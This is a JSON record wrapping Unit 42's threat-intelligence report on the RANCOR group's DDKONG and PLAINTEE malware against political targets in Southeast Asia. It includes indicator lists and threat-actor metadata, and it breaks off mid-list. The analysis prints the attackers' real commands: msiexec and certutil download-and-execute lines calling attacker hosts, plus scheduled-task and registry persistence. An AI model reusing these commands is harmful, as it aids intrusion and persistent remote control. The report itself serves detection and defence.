{ "id": "6f7966ea-92c1-4f6d-ae50-07bac31807f9", "created_at": "2026-04-06T00:11:05.553497Z", "updated_at": "2026-04-10T03:37:50.032171Z", "deleted_at": null, "sha1_hash": "8c43c98c4d92b683088413f7f1c9be56e1e2a0f6", "title": "RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1946307, "plain_text": "RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and\r\nDDKONG Malware Families\r\nBy Brittany Barbehenn, Josh Grunzweig, Tom Lancaster\r\nPublished: 2018-06-26 · Archived: 2026-04-05 12:54:48 UTC\r\nThroughout 2017 and 2018 Unit 42 has been tracking and observing a series of highly targeted attacks focused in South East\r\nAsia, building on our research into the KHRAT Trojan. Based on the evidence, these attacks appear to be conducted by the\r\nsame set of attackers using previously unknown malware families. In addition, these attacks appear to be highly targeted in\r\ntheir distribution of the malware used, as well as the targets chosen. Based on these factors, Unit 42 believes the attackers\r\nbehind these attacks are conducting their campaigns for espionage purposes.\r\nWe believe this group is previously unidentified and therefore have we have dubbed it “RANCOR”. The Rancor group’s\r\nattacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and\r\nPLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be new addition to these attackers’\r\ntoolkit.  Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to:\r\nSingapore\r\nCambodia\r\nWe identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual\r\nmessages. These decoys contain details from public news articles focused primarily on political news and events. Based on\r\nthis, we believe the Rancor attackers were targeting political entities.  Additionally, these decoy documents are hosted on\r\nlegitimate websites including a government website belonging to the Cambodia Government and in at least once case,\r\nFacebook.\r\nThe malware and infrastructure used in these attacks falls into two distinct clusters, which we are labeling A and B, that are\r\nlinked through their use of the PLAINTEE malware and several “softer” linkages.\r\n  Linking the attacks\r\nBuilding on our previous research into KHRAT Trojan, we have been monitoring KHRAT command and control domains. In\r\nFebruary 2018, several KHRAT associated domains began resolving to the IP address 89.46.222[.]97. We made this IP the\r\ncenter of our investigation.\r\nExamining passive DNS (pDNS) records from PassiveTotal revealed several domain names associated with this IP that\r\nmimic popular technology companies. One of these domains, facebook-apps[.]com, was identified in one of the malware\r\nsamples associated with this IP address.\r\nThe following table depicts the two malware samples that are directly related to this IP address:\r\nSHA256 Description\r\nConnection to IP\r\n \r\n0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855 Loader\r\nC2 facebook-apps.com\r\n(resolves to\r\n89.46.222.97)\r\nc35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d PLAINTEE\r\nHosted on\r\n89.46.222.97\r\n \r\nDigging in further, the malware family we later named “PLAINTEE” appears to be quite unique with only six samples\r\npresent in our data set.\r\nApart from one sample (c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d), we were able to link\r\nall PLAINTEE samples together by the infrastructure they use. The diagram in Figure 1 shows the samples, domains, IP\r\naddresses and e-mail addresses that we identified during our investigation (See Appendix B for more detail on these.) There\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/\r\nPage 1 of 10\n\nis a clear split between Cluster A and Cluster B, with no infrastructure overlap between the two.\r\nFigure 1 - Diagram showing the split of PLAINTEE samples across the two clusters of activity.\r\n \r\nOur Investigation into both clusters further showed that they were both involved in attacks targeting organizations in South\r\nEast Asia. Based on the use of the relatively unique PLAINTEE malware, the malware’s use of the same file paths on in\r\neach cluster, and the similar targeting, we have grouped these attacks together under the RANCOR campaign moniker.\r\n  Delivery \u0026 Loader mechanisms\r\nFor many of the samples we’ve been unable to identify how they were delivered to end victims; however, in three cases we\r\nwere able to locate the files used to deliver the Trojan, which we found merited more investigation and are briefly discussed\r\nbelow.\r\n  Cluster A\r\nCase 1: Delivery via document property macro –\r\na789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483\r\n In our research we found at least one attack against a company leveraging a Microsoft Office Excel document with an\r\nembedded macro to launch the malware. Interestingly, the delivery document borrowed a technique which was publicized in\r\nlate 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the\r\ndocument.\r\nBy doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious’ codes small\r\nfootprint can help enable evasion of automated detection mechanisms based on macro content.\r\nFigure 2 – The entire contents of the macro\r\n \r\nThe 'Company' field in this case, contains the raw command that the attacker wishes to run, downloading and executing the\r\nnext stage of the malware:\r\ncmd /c set /p=Set v=CreateObject(^\"Wscript.Shell^\"):v.Run ^\"msiexec /q /i\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/\r\nPage 2 of 10\n\nhttp://199.247.6.253/ud^\",false,0 \u003cnul \u003e\r\nC:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs \u0026 schtasks /create /sc MINUTE\r\n/tn \"Windows System\" /tr \"C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs\"\r\n/mo 2 /F \u0026 schtasks /create /sc MINUTE /tn \"Windows System\" /tr\r\n\"C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs\" /mo 2 /RU SYSTEM /c set\r\n/p=Set v=CreateObject(^\"Wscript.Shell^\"):v.Run ^\"msiexec /q /i\r\nhttp://199.247.6.253/ud^\",false,0 \u003cnul \u003e\r\nC:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs \u0026 schtasks /create /sc MINUTE\r\n/tn \"Windows System\" /tr \"C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs\"\r\n/mo 2 /F \u0026 schtasks /create /sc MINUTE /tn \"Windows System\" /tr\r\n\"C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs\" /mo 2 /RU SYSTEM\r\n \r\nCluster B\r\nCase 2: Delivery via HTA Loader - 1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458\r\n In this case the attackers sent an HTML Application file (.hta) to targets most likely as an email attachment. When opened\r\nand then executed, the key components of the HTA file downloads and executes further malware from a remote URLand\r\nloads a decoy image hosted externally (Figure 3).\r\n \r\nFigure 3 – The decoy image loaded when the .HTA file is executed.\r\n \r\nThe decoy in Figure 3 strongly suggests the attackers were conducting an attack against a political entity in Cambodia. The\r\nCambodia National Rescue Party is a politically motivated opposition movement.\r\n  Case 3: Delivery via DLL Loader -\r\n0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855\r\n We identified three unique DLL loaders during this analysis. The loaders are extremely simple with a single exported\r\nfunction and are responsible for executing a single command. An exemplar command is given below:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\ncmd /c Echo CreateObject(\"WScript.Shell\").Run \"msiexec /q /i\r\nhttp:\\\\dlj40s.jdanief[.]xyz/images/word3.doc\",0\r\n\u003e%userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs /c Echo\r\nCreateObject(\"WScript.Shell\").Run \"msiexec /q /i\r\nhttp:\\\\dlj40s.jdanief[.]xyz/images/word3.doc\",0\r\n\u003e%userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/\r\nPage 3 of 10\n\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\nschtasks /create /sc MINUTE /tn \"Windows Scheduled MaintenBa\" /tr \"wscript\r\n%userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs\" /mo 10 /F /create /sc\r\nMINUTE /tn \"Windows Scheduled MaintenBa\" /tr \"wscript\r\n%userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs\" /mo 10 /F\r\ncmd /c certutil.exe -urlcache -split -f\r\nhttp:\\\\\\\\dlj40s.jdanief[.]xyz/images/1.pdf C:\\ProgramData\\1.pdf\u0026start\r\nC:\\ProgramData\\1.pdf /c certutil.exe -urlcache -split -f\r\nhttp:\\\\\\\\dlj40s.jdanief[.]xyz/images/1.pdf C:\\ProgramData\\1.pdf\u0026start\r\nC:\\ProgramData\\1.pdf\r\nIn the above command, the malware is downloading and executing a payload and configuring it for persistent execution. In\r\ntwo of the three examples, the malware also downloads and opens a decoy PDF document hosted on a legitimate but\r\ncompromised website. The decoy documents seen in these cases were related to Cambodian news articles, an example is\r\nshown in Figure 4 below.\r\n \r\nFigure 4 - 1.pdf decoy delivered by downloader\r\n \r\nThe decoy above discusses a recent event that took place against political party supporters in Cambodia, a similar theme to\r\nthe decoy document observed in Figure 3.\r\nIt is worth noting that the third DLL mentioned attempts to download the decoy document from a government website. This\r\nsame website was used previously in a KHRat campaign targeting Cambodian citizens.\r\nAdditionally, two of the three DLL loaders were found to be hosted on this same compromised website, implying that it was\r\nlikely compromised again in early 2018. The filenames for these two DLL loaders are as follows:\r\nActivity Schedule.pdf\r\nអ្នកនយោ បាយក្បត់លើ ក្បត (Translated from Khmer: Politicians betrayed on the betrayal)\r\nMalware Overview\r\nIn all cases where we were able to identify the final payloads used, the DDKONG  or PLAINTEE malware families were\r\nused. We observed DDKONG in use between February 2017 and the present, while PLAINTEE is a newer addition with the\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/\r\nPage 4 of 10\n\nearliest known sample being observed in October 2017. It’s unclear if DDKONG is only used by one threat actor or more\r\nthan one based on the data available.\r\nIn this section we’ll go over the capabilities and operation of these malware families.\r\n  DDKONG\r\nFor the analysis below, we used the following file:\r\nSHA256 119572fafe502907e1d036cdf76f62b0308b2676ebdfc3a51dbab614d92bc7d0\r\nSHA1 25ba920cb440b4a1c127c8eb0fb23ee783c9e01a\r\nMD5 6fa5bcedaf124cdaccfa5548eed7f4b0\r\nCompile Time 2018-03-14 07:20:11 UTC\r\nFile Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nTable 1 – DDKONG sample analyzed in full.\r\n \r\nThe malware in question is configured with the following three exported functions:\r\nServiceMain\r\nRundll32Call\r\nDllEntryPoint\r\nThe ServiceMain exported function indicates that this DLL is expected to be loaded as a service. If this function is\r\nsuccessfully loaded, it will ultimately spawn a new instance of itself with the Rundll32Call export via a call to rundll32.exe.\r\nThe Rundll32Call exported function begins by creating a named event named ‘RunOnce’. This event ensures that only a\r\nsingle instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the\r\nmalware continues. If it’s not, it dies. This ensures that only a single instance of DDKong is executed at a given time.\r\nDDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3. Once decoded, the\r\nconfiguration contains the data shown in Figure 5 below.\r\nFigure 5 - Decoded configuration with fields highlighted\r\n \r\nAfter this configuration is decoded and parsed, DDKONG proceeds to send a beacon to the configured remote server via a\r\nraw TCP connection. The packet has a header of length 32 and an optional payload. In the beacon, no payload is provided,\r\nand as such, the length of this packet is set to zero.\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/\r\nPage 5 of 10\n\nFigure 6 – DDKONG beacon to remote C2\r\n \r\nAfter it sends the beacon, the malware expects a response command of either 0x4 or 0x6. Both responses instruct the\r\nmalware to download and load a remote plugin. In the event 0x4 is specified, the malware is instructed to load the exported\r\n‘InitAction’ function. If 0x6 is specified, the malware is instructed to load the exported ‘KernelDllCmdAction’ function.\r\nPrior to downloading the plugin, the malware downloads a buffer that is concatenated with the embedded configuration and\r\nultimately provided to the plugin at runtime. An example of this buffer at runtime is below:\r\n  00000000: 43 3A 5C 55 73 65 72 73  5C 4D 53 5C 44 65 73 6B  C:\\Users\\MS\\Desk\r\n00000010: 74 6F 70 5C 52 53 2D 41  54 54 20 56 33 5C 50 6C  top\\RS-ATT V3\\Pl\r\n00000020: 75 67 69 6E 42 69 6E 00  00 00 00 00 00 00 00 00  uginBin.........uginBin.........\r\n[TRUNCATED]\r\n00000100: 00 00 00 00 43 3A 5C 55  73 65 72 73 5C 4D 53 5C  ....C:\\Users\\MS\\\r\n00000110: 44 65 73 6B 74 6F 70 5C  52 53 2D 41 54 54 20 56  Desktop\\RS-ATT V\r\n00000120: 33 5C 5A 43 6F 6E 66 69  67 00 00 00 00 00 00 00  3\\ZConfig.......ZConfig.......\r\n[TRUNCATED]\r\n00000200: 00 00 00 00 00 00 00 00  00 40 00 00 F0 97 B5 01  .........@......\r\n  As we can see in the above text, two full file paths are included in this buffer, providing us with insight into the original\r\nmalware family’s name, as well as the author. After this buffer is collected, the malware downloads the plugin and loads the\r\nappropriate function. During runtime, the following plugin was identified:\r\nSHA256 0517b62233c9574cb24b78fb533f6e92d35bc6451770f9f6001487ff9c154ad7\r\nSHA1 03defdda9397e7536cf39951246483a0339ccd35\r\nMD5 a5164c686c405734b7362bc6b02488cb\r\nCompile Time 2018-03-28 01:54:40 UTC\r\nFile Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nTable 2 – Plugin downloaded during runtime for DDKong sample.\r\n \r\nThis plugin provides the attacker with the ability to both list files and download/upload files on the victim machine.\r\n  PLAINTEE\r\nIn total we have been able to find six samples of PLAINTEE, which, based on our analysis, seems to be exclusively used by\r\nthe RANCOR attackers. PLAINTEE is unusual in that it uses a custom UDP protocol for its network communications. For\r\nthis walk through, we use the following sample:\r\nSHA256 c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d\r\nSHA1 0bdb44255e9472d80ee0197d0bfad7d8eb4a18e9\r\nMD5 d5679158937ce288837efe62bc1d9693\r\nCompile Time 2018-04-02 07:57:38 UTC\r\nFile Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nTable 3 – PLAINTEE sample analyzed in full.\r\nThis sample is configured with three exported functions:\r\nAdd\r\nSub\r\nDllEntryPoint\r\nThe DLL expects the export named 'Add' to be used when initially loaded. When this function is executed PLAINTEE\r\nexecutes the following command in a new process to add persistence:\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/\r\nPage 6 of 10\n\ncmd.exe /c reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\\r\nCurrentVersion\\RunOnce\" /v \"Microsoft Audio\" /t REG_SZ /d \"%APPDATA%\\Network\r\nService.exe\" \"[path_to_PLAINTEE]\",Add /freg add\r\n\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ CurrentVersion\\RunOnce\" /v\r\n\"Microsoft Audio\" /t REG_SZ /d \"%APPDATA%\\Network Service.exe\"\r\n\"[path_to_PLAINTEE]\",Add /f\r\nNext, the malware calls the ‘Sub’ function which begins by spawning a mutex named ‘microsoftfuckedupb’ to ensure only a\r\nsingle instance is running at a given time. In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to\r\nbe used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the\r\ninfected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2\r\nserver.\r\nThe configuration blob is encoded using a simple single-byte XOR scheme. The first byte of the string is used as the XOR\r\nkey to in turn decode the remainder of the data.\r\n  Decoding this blob yields the following information, also found within the original binary:\r\nOffset Description\r\n0x4 C2 port (0x1f99 – 8089)\r\n0x8 C2 host (45.76.176[.]236)\r\n0x10C Flag used to identify the malware in network communications. (default flag:4/2/2018 1:01:33 AM)\r\nTable 4 – Configuration stored in the malware.\r\n \r\nThe malware then proceeds to beacon to the configured port via a custom UDP protocol. The network traffic is encoded in a\r\nsimilar fashion, with a random byte being selected as the first byte, which is then used to decode the remainder of the packet\r\nvia XOR.  An example of the decoded beacon is show in Figure 7.\r\nFigure 7 PLAINTEE example beacon\r\n \r\nThe structure for this beacon is given in Table 5.\r\n \r\nOffset Description\r\n0x0 Victim GUID (8C8CEED9-4326-448B-919E-249EEC0238A3)\r\n0x25 Victim IP Address (192.168.180.154)\r\n0x45 Command (0x66660001)\r\n0x49 Length of payload (0x2f – 47)\r\n0x4d Field 1 - Windows major version (0x6 – Windows Vista+)\r\n0x51 Field 2 - Windows minor version (0x1 – Windows 7)\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/\r\nPage 7 of 10\n\n0x55 Field 3 - Unknown (0x20)\r\n0x59 Payload (default flag:4/2/2018 1:01:33 AM)\r\nTable 5 – Beacon structure for PLAINTEE.\r\n \r\nThis beacon is continuously sent out until a valid response is obtained from the C2 server (there is no sleep timer set). After\r\nthe initial beacon, there is a two second delay in between all other requests made. This response is expected to have a return\r\ncommand of 0x66660002 and to contain the same GUID that was sent to the C2 server. Once this response is received, the\r\nmalware spawns several new threads, with different Command parameters, with the overall objective of loading and\r\nexecuting a new plugin that is to be received from the C2 server.\r\nDuring a file analysis of PLAINTEE in WildFire, we observed the attackers download and execute a plugin during the\r\nruntime for that sample. The retrieved plugin was as follows:\r\nSHA256 b099c31515947f0e86eed0c26c76805b13ca2d47ecbdb61fd07917732e38ae78\r\nSHA1 ac3f20ddc2567af0b050c672ecd59dddab1fe55e\r\nMD5 7c65565dcf5b40bd8358472d032bc8fb\r\nCompile Time 2017-09-25 00:54:18 UTC\r\nFile Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nTable 6 – PLAINTEE plugin observed in Wildfire\r\n \r\nPLAINTEE expects the downloaded plugin to be a DLL with an export function of either 'shell' or 'file'. The plugin uses the\r\nsame network protocol as PLAINTEE and so we were able to trivially decode further commands that were sent.  The\r\nfollowing commands were observed:\r\ntasklist\r\nipconfig /all\r\nThe attacker performed these two commands 33 seconds apart. As automated commands are typically performed more\r\nquickly this indicates that they may have been sent manually by the attacker.\r\n  Conclusions\r\nThe RANCOR campaign represents a continued trend of targeted attacks against entities within the South East Asia region.\r\nIn a number of instances, politically motivated lures were used to entice victims into opening and subsequently loading\r\npreviously undocumented malware families. These families made use of custom network communication to load and\r\nexecute various plugins hosted by the attackers. Notably the PLAINTEE malwares’ use of a custom UDP protocol is rare\r\nand worth considering when building heuristics detections for unknown malware. Palo Alto Networks will continue to\r\nmonitor these actors, their malware, and their infrastructure going forward.\r\nPalo Alto Networks customers are protected against the threats discussed in this blog in the following ways:\r\nWildfire correctly identifies all samples discussed as malicious.\r\nTraps appropriately blocks the malware from executing.\r\nAutoFocus customers may track this threat via the KHRAT, DDKONG, PLAINTEE, and RANCOR tags.\r\nAdditional mitigations that could help to prevent attacks like these from succeeding in your environment include:\r\nChanging the default handler for “.hta” files in your environment so that they cannot be directly executed.hta” files in\r\nyour environment so that they cannot be directly executed.\r\n \r\nAppendix A – PLAINTEE older variant\r\nOlder variants of PLAINTEE can be identified via the unique mutex created during runtime. At least three variants of\r\nPLAINTEE have been identified to date, however, the following two samples have additional unique differences:\r\n \r\nHash Functions M\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/\r\nPage 8 of 10\n\nbcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e helloworld\r\nhelloworld1,helloworld2,sqmAddTostream,DllEntryPoint\r\nmi\r\n6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31\r\n \r\nThe following actions are performed with the additional functions:\r\nhelloworld - performs actions identical to the newer sample’s ‘Sub’ function\r\nhelloworld1 – accepts command-line arguments, performs a UAC bypass\r\nhelloworld2 – drops and compiles a mof filemof file\r\nsqmAddTostream – expected to run initially by the malware, checks OS version and loads the malware with\r\nhelloworld2\r\nAppendix B\r\nType Value Cluster\r\nLoaders\r\nHash 0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855 B\r\nHash 1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458 B\r\nDomain www.facebook-apps.com B\r\nDomain dlj40s.jdanief.xyz B\r\nIP 89.46.222.97 B\r\nHash a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483 A\r\nPLAINTEE\r\nHash 863a9199decf36895d5d7d148ce9fd622e825f393d7ebe7591b4d37ef3f5f677 A\r\nHash 22a5bd54f15f33f4218454e53679d7cfae32c03ddb6ec186fb5e6f8b7f7c098b A\r\nHash c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d B\r\nIP 199.247.6.253 A\r\nIP 45.76.176.236 A\r\nMutex microsoftfuckedupb A\r\nHash 9f779d920443d50ef48d4abfa40b43f5cb2c4eb769205b973b115e04f3b978f5 A\r\nHash bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e A\r\nHash 6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31 A\r\nHash b099c31515947f0e86eed0c26c76805b13ca2d47ecbdb61fd07917732e38ae78 A\r\nDomain goole.authorizeddns.us A\r\nMutex Microsoftfuckedup A\r\nIP 103.75.189.74 A\r\nIP 131.153.48.146 A\r\nDDKONG\r\nHash 15f4c0a589dff62200fd7c885f1e7aa8863b8efa91e23c020de271061f4918eb A\r\nDomain microsoft.authorizeddns.us A\r\nIP 103.75.191.177 A\r\nHash 0f102e66bc2df4d14dc493ba8b93a88f6b622c168e0c2b63d0ceb7589910999d A\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/\r\nPage 9 of 10\n\nHash 84607a2abfd64d61299b0313337e85dd371642e9654b12288c8a1fc7c8c1cf0a A\r\nHash a725abb8fe76939f0e0532978eacd7d4afb4459bb6797ec32a7a9f670778bd7e A\r\nHash 82e1e296403be99129aced295e1c12fbb23f871c6fa2acafab9e08d9a728cb96 A\r\nHash 9996e108ade2ef3911d5d38e9f3c1deb0300aa0a82d33e36d376c6927e3ee5af A\r\nDomain www.google_ssl.onmypc.org A\r\nHash 18e102201409237547ab2754daa212cc1454f32c993b6e10a0297b0e6a980823 A\r\nIP 103.75.191.75 A\r\nHash c78fef9ef931ffc559ea416d45dc6f43574f524ba073713fddb79e4f8ec1a319 A\r\nHash 01315e211bac543195f2c703033ba31b229001f844854b147c4b2a0973a7d17b A\r\nHash b8528c8e325db76b139d46e9f29835382a1b48d8941c47060076f367539c2559 A\r\nHash df14de6b43f902ac8c35ecf0582ddb33e12e682700eb55dc4706b73f5aed40f6 A\r\nHash 177906cb9170adc26082e44d9ad1b3fbdcba7c0b57e28b614c1b66cc4a99f906 A\r\nHash 113ae6f4d6a2963d5c9a7f42f782b176da096d17296f5a546433f7f27f260895 A\r\nDomain ftp.chinhphu.ddns.ms A\r\nHash 128adaba3e6251d1af305a85ebfaafb2a8028eed3b9b031c54176ca7cef539d2 A\r\nDomain www.microsoft.https443.org A\r\nIP 45.121.146.26 A\r\nHash 5afbee76af2a09c173cf782fd5e51b5076b87f19b709577ddae1c8e5455fc642 A\r\nDomain msdns.otzo.com A\r\nHash 119572fafe502907e1d036cdf76f62b0308b2676ebdfc3a51dbab614d92bc7d0 A\r\nDomain goole.authorizeddns.us A\r\nIP 103.75.189.74 A\r\nSource: https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/\r\nhttps://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/\r\nPage 10 of 10\n\n0x25 Victim 0x45 Command IP Address (192.168.180.154) (0x66660001) \n0x49 Length of payload (0x2f -47) \n0x4d Field 1-Windows major version (0x6-Windows Vista+)\n0x51 Field 2-Windows minor version (0x1-Windows 7)\n Page 7 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "Malpedia" ], "references": [ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" ], "report_names": [ "unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families" ], "threat_actors": [ { "id": "e8aee970-e31e-489f-81c2-c23cd52e255c", "created_at": "2023-01-06T13:46:38.763687Z", "updated_at": "2026-04-10T02:00:03.092181Z", "deleted_at": null, "main_name": "RANCOR", "aliases": [ "Rancor Group", "G0075", "Rancor Taurus", "Rancor group", "Rancor" ], "source_name": "MISPGALAXY:RANCOR", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6d11e45c-4e31-4997-88f5-295b2564cfc6", "created_at": "2022-10-25T15:50:23.794721Z", "updated_at": "2026-04-10T02:00:05.358892Z", "deleted_at": null, "main_name": "Rancor", "aliases": [ "Rancor" ], "source_name": "MITRE:Rancor", "tools": [ "DDKONG", "PLAINTEE", "certutil" ], "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "416f8374-2b06-47e4-ba91-929b3f85d9bf", "created_at": "2022-10-25T16:07:24.093951Z", "updated_at": "2026-04-10T02:00:04.864244Z", "deleted_at": null, "main_name": "Rancor", "aliases": [ "G0075", "Rancor Group", "Rancor Taurus" ], "source_name": "ETDA:Rancor", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "Agentemis", "Cobalt Strike", "CobaltStrike", "DDKONG", "Derusbi", "Dudell", "ExDudell", "KHRAT", "PLAINTEE", "RoyalRoad", "certutil", "certutil.exe", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", 